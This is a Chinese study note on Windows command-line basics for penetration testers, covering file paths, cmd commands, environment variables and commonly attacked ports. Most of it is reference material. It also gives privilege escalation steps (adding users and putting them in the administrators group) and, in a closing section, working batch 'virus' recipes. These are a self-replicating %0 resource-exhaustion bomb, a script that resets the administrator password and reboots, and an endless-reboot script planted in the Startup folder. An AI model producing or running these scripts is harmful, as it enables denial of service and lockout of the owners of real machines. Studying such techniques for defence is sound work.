网络安全-Windows基础

声明
学习视频来自 B 站UP主泷羽sec，如涉及侵权马上删除文章。

笔记的只是方便各位师傅学习知识，以下网站只涉及学习内容，其他的都与本人无关，切莫逾越法律红线，否则后果自负。

X

windows基础，里面包含大量有关渗透测试的Windows操作命令，因为在进入内网后我们大多都没有更高的权限，只能通过命令行进行操作，所以熟练掌握Windows命令与一些Windows基础是对之后内网渗透入机器后进行操作的基础。

Windows基础

文件系统

Linux:fhs目录结构，块设备挂载到目录（一切都是文件）

Windows:以驱动盘符起始，或通过目录挂载

路径格式

Linux: / 开始，区分大小写（左斜线）

Windows: \ 开始，不区分大小写（右斜线）

系统配置

Linux: /etc 和 /proc (存储信息在目录里)

Windows: 注册表 (存储信息在注册表里)

Windows 四种shell接口

1. GUI 图形化用户接口，操作简单
2. cmd命令行用户接口，包含一组预定义命令
3. wmic微软基于wbem的实现，从21h1版本已经启用，被powershell所代替
4. powershell 自动化脚本框架，支持.net架构

WSL（在Windows上运行的子系统）

Windows Subsystem for Linux (WSL) 是一种在Windows 10和Windows 11上运行Linux二进制可执行文件（ELF格式）的兼容层。

WSL允许用户在Windows系统上直接运行Linux环境，无需使用虚拟机或进行双启动设置。它通过操作系统级虚拟化，将Linux子系统无缝嵌入到Windows中，提供原生Linux命令行工具、软件包管理器及应用程序支持。

cmd 内置命令

cd\ (切换到根目录)

help (查看cmd内置命令)

Windows常用命令

文件系统

cd 目录移动

cmd 显示操作系统版本信息

copy 文件复制

del 删除至少一个文件

dir 显示目录下面文件和子目录

echo 显示消息，或将命令回显打开或关闭

erase 删除一个或多个文件

find 在文件中查找一个文件

findstr 在多个文件中搜索字符串

mkdir 创建一个目录（在当前目录中）

mmore 逐屏显示输出

move 将文件进行移动

ren 重命名文件

rmdir 删除目录

type 显示文件类型

attrib 显示或修改文件扩展名关联

bcdedit 设置启动数据库中的属性以控制启动加载

icacls 显示或修改文件的访问控制列表

chcp 显示或设置活动代码的页数

comp 比较两个文件的内容

date 显示或设置日期

diskpart 显示或配置磁盘分区属性

doskey 编辑命令行，撤回Windows命令

driverquery 显示当前设备驱动程序状态和属性

fc 比较两个文件集并显示他们的不同

for 为一组文件中的每个文件运行一个指令

fsutil 显示或配置文件系统属性

ftype 显示或修改在文件扩展名关联使用的文件类型

gpresult 显示计算机或者用户的组策略信息

mklink 创建符号链接和硬链接

openfiles 显示远程用户通过文件共享打开的本地文件

path 为可执行文件显示或者设置搜索路径

系统操作

set 显示“设置”或删除Windows环境变量

sc 显示或者配置服务（后台进程）

schtasks 安排一台计算机上运行命令和程序

shutdown 通过本地或远程的方式正确关闭计算机

start 启动单独的敞口以运行指定的程序或者命令

systeminfo 显示计算机的特定属性和配置

tasklist 显示包括服务在内的所有当前运行的任务

taskkill 终止正在运行的进程或者应用程序

tree 文件目录以树状图的形式显示出来

time 显示或设置系统时间

tracert 网络路径追踪

文件导航系统

• 返回驱动根目录

cd\

cd…

• 查看系统隐藏文件

dir/A

• 搜索文件名

dir/s flag.txt

• 最近编辑的文件

dir/tw/od

系统标准目录

1. perflogs 储存Windows性能日志

2. Program Files文件夹

   win x86为32位系统，储存32位程序，在32位系统中，Program Files文件夹通常用于存储32位应用程序。

​ win x64为64位系统，储存64位程序，在64位系统中，Program Files文件夹用于存储64位应用程序。

​ 但是64位操作系统通常可以运行32位应用程序，这是通过一个称为Windows 32位 on Windows 64-bit (WOW64) 的兼容层实现的。在64位系统中，32位应用程序被存储在一个名为Program Files (x86)的文件夹中，以区别于64位应用程序的Program Files文件夹。

3. programdata隐藏目录，包含全局程序数据，所有登录用户都访问这些数据

users 包含用户主目录（登录过的用户)

4. users 包含用户主目录（登录过的用户)
5. users\public 用户间共享文件，所有用户都有权访问
6. users[username] \appdata隐藏子目录，存储用户应用程序数据和设置
7. Windows\system, system32, syswow64存储动态链接库文件，Windows和api的核心文件

系统及环境变量

• 系统信息查询可视化

systeminfo命令在Windows中用于显示关于计算机及其操作系统的详细配置信息，包括操作系统配置、安全信息、产品 ID 和硬件属性，如 RAM、磁盘空间和网卡和补丁信息等。

msinfo32命令可以显示在本地计算机上内容的视图，它的作用是打开系统信息工具，以显示在本地计算机上的硬件、 系统组件和软件环境的全面视图。

• 环境变量

在cmd命令窗口中

echo %username%命令查看当前用户名

echo %path%命令查看环境变量的值

echo %temp%命令查看temp目录路径

echo %userprofile%命令查看当前用户目录路径

set 将当前命令行下的环境变量列出

``永久修改环境变量 ` setx 对环境变量的修改是永久性的，系统重启依然有效

setx var1 brand1

变量位于：hkey_current_user\environment

常见端口和服务

21：FTP 用于上传、下载文件。

22：SSH 用于通过命令行模式远程连接Linux服务器或vps。

23：Telnet 用于Telnet远程登录服务器。

25：SMTP 用于发送邮件。

80：HTTP 用于HTTP服务提供访问功能，例如，IIS、Apache、Nginx 等服务。

80-89端口可能是web，有的web服务不放在80端口，而是放在80-89中的一个端口

110：POP3 用于POP3 协议，POP3 是电子邮件收发的协议。

143：IMAP 用于IMAP（Internet Message Access Protocol）协议，IMAP 是用于电子邮件的接收的协议。

443：HTTPS 用于HTTPS服务提供访问功能。HTTPS 是一种能提供加密和通过安全端口传输的一种协

议。 (SSL心脏滴血漏洞)

445 SMB

1433：SQL Server SQL Server的TCP 端口，用于供SQL Server对外提供服务。

1434：SQL Server SQL Server的UDP端口，用于返回SQL Server使用了哪个 TCP/IP 端口。

1521：Oracle通信端口，服务器上部署了Oracle SQL需要放行的端口。

2082/2083 cpanel 主机管理系统登录（国外用的比较多）

2222 da虚拟主机管理系统登录（国外较多）

3128 squid代理默认端口（实现内网漫游）

3306：MySQL数据库对外提供服务的端口。

3312/3311 kangle主机管理系统登录

3389：远程桌面服务端口，可以通过这个端口远程连接服务器。

5432 postgreSQL一个关系型数据库

5900 VNC 链接设备（VNC未授权访问）

6379 redis (存在未授权)

7001、7002 weblogic (默认弱口令，反序列化)

7778 kioxo主机控制面板登录

8080/8089/9090 jboss

8080：代理端口,同80端口一样，8080 端口常用于WWW代理服务，实现网页浏览。

8083 vestacp主机管理系统登录

8649 ganglia

8888 宝塔 主机管理系统

10000 virtuamin/webmin 服务器虚拟主机管理系统

11211 memcache （未授权访问）

27017、27018 mongodb (未授权访问)

28017 mongodb 统计系统页面

常用cmd命令

1. echo (输出)

echo /? --查看帮助文档

echo 1 --输出 1

echo 1 >1.txt --输出1并重定向到1.txt (如果文件名相同会将原有文件进行覆盖)

注意：1与>之间的空格不能少或丢，否则直接按照echo命令输出

echo 4567 >>1.txt --将输出的内容追加到1.txt文件中

echo OFF --关闭回显 echo ON --打开回显

2. dir (展示当前目录的文件)

3. d: c: 等和cd

d: --切换至D盘

cd . --进入当前目录

cd … --返回上一级目录

cd desktop --返回桌面(DeskTop也行，因为Windows不区分大小写)

cd / --返回当前硬盘的根目录

4. tree （将文件目录以树状图的结构进行展示）

tree /? --查看帮助文档

/f --选项 显示每个文件夹中文件的名称

/a --选项 使用ASCII字符，而不使用扩展字符

tree C:\Users\Administrator /f 或 tree C:\Users\Administrator /a 在渗透测试中经常进行使用

5. md创建目录 rd删除目录

md kkk --在当前目录中创建名为kkk的文件夹 （md是mkdir缩写）

rd kkk --在当前目录中删除名为kkk的文件夹 (rd是rmdir的缩写)

6. ipconfig (查看网卡信息) --网络状况、ip配置

ipconfig /all --将本机所有的网络信息进行打印

7. cls --对命令终端进行清屏操作
8. copy(复制或拼接文件)

copy /? --查看copy命令帮助文档

copy 1.txt …\1.txt --将1.txt文件复制到上一级文件目录中

copy 1.txt desktop\2.txt --将1.txt复制到桌面中并且重命名为2.txt

拼接操作：

echo 123 >1.txt

echo 456 >2.txt

copy 1.txt+2.txt >3.txt

9. move (文件移动)

move …\1.txt 4.txt --将上级目录中的1.txt文件移动到本级中并且重命名4.txt文件

10. ren (重命名)

ren 4.txt 5.txt --将4.txt重命名为5.txt

11. del (删除)

del 1.txt 2.txt .3.txt --删除1.txt 2.txt .3.txt 文件

12. ping (用于探测主机ip是否存活)

ping /? --帮助文档

-t --选项，表示一直ping执行

13. type (显示文本内容)

type 1.txt --显示1.txt的文本内容

14. reg (注册表)

reg /? --帮助文档

15. nslookup (探测域名信息)

nslookup www.baidu.com --探测域名详细信息

nslookup -d www.baidu.com --查询历史解析记录

16. find(查找)

find /? --帮助文档

find “a” 1.txt --在1.txt中寻找带有a的字段

find /n “a” 1.txt --选项/N,为显示行数，并进行排序

17. tasklist (显示进程)

tasklist /? --帮助文档

18. taskkill (杀死进程)

taskkill /? --帮助文档

taskkill /pid 123 --杀死进程PID为123的进程

19. ver,winver (显示版本)
20. start (开启命令)

start 进程名 --开启一个进程

start ping IP -t --启动ping命令执行

21. systeminfo (查看系统信息)

22. logoff (注销)

logoff /? --查看帮助文档

(后期提权成功后，可以用logoff将对方远程登录的会话进行注销)

23. shutdown (关机)

shutdown /? --帮助文档

shutdown /s 在一分钟内关机

shutdown /a 计划取消

shutdown /r 重启

shutdown /g 在一分钟内关机

shutdown /r /t 0 -t设置时间，时间为0时执行

24. telnet（协议工具）

使用这条命令前需要到控制面板-程序-打开或关闭Windows功能-勾选telnet客户端

telnet IP地址 --远程连接

25. arp (自己的ip地址和物理机的映射关系表)

arp -a – 查看当前内网有那些主机可以进行横向移动(有助于进行横向移动)

26. at (定时命令)

at “shutdown /r /t 0” --定时关机

at 1 /delete --取消定时任务

27. net (服务) （有一部分需要使用管理员权限进行执行）

net stop telnet --关闭telnet服务

net start telnet --开启telnet服务

net user --查看当前用户

net user admin2 123 /add --添加用户名为admin2 密码为123 的用户账号

net user admin --查看admin 用户权限

net user administratorr --查看管理员权限

net localgroup administrator admin /add --用户提权将admin用户提权为超级管理员权限

编写bat病毒

资源耗尽病毒

echo start cmd >scvul.txt --将启动cmd的命令写入文本

echo %0 >>scvul.txt --无限启动文件命令写入文本

ren scvul.txt scvul.bat --将文本文件重命名成脚本文件

（%0：它是一个逻辑炸弹，它不断地自我重建，并占用你所有的CPU资源。过多的进程会使您的计算机过载，并迫使计算机关机。%0永远不会结束，但它永远不会创建多个进程，因为它会立即将控制转移到第二批处理脚本(恰好是它自己)。）

自动锁机病毒

echo net user Badmin 123456 > c:\windows\Temp\zd.bat

–修改管理员用户密码改成123456的命令写入到1.bat文件

echo shutdown /r /t 0 >> c:\windows\Temp\zd.bat

–将关机命令写入到1.bat文件，运行后直接修改管理员密码达成锁机效果

无限重启病毒

echo shutdown /r /t 0 >cq.bat

copy cq.bat C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

将写好的命令脚本到开机自启动目录，当电脑开机时就启动这个脚本，运行关机命令

首先 Windows+R 打开 运行窗口

然后输入 shell:common startup

打开的路径是：C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

当输入密码后进入系统，系统自动执行自启动脚本然后重新启动